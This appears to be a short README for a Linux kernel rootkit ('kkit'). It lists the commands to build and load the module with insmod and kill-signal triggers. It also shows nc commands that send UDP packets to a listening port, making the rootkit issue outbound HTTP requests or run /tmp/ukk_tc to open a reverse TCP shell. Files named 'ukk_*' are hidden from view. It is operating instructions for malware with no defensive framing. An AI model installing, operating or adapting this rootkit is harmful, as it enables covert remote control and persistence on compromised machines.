A Linux Kernel RootKit
make
insmod kkit.ko
kill -62 0
kill -60 pid
kill -61 0
Trigger to send a http request:
# Server:
nc -p 1338 123.123.123.123 50005 -u
fdsfasd
If the kkit received a udp packet sended from 1338 port to 50005 port, the kkit will send a http packet to the targeted server ip
#server:
python3 -m http.server 50002
#Server
nc -p 1339 123.123.123.123 50005 -u
fsdfsdaf
If the kkit received a udp packet sended from 1339 port to 50005 port, the kkit will exexcve /tmp/ukk_tc If the ukk_tc is a binary will establish reverse tcp connection, the kkit can establish reverse tcp connection
If want to see the running debug log:
#Server
nc -p 1340 123.123.123.123 50005 -u
fsdfsdaf
If the filename is "ukk_*", the file will be hided.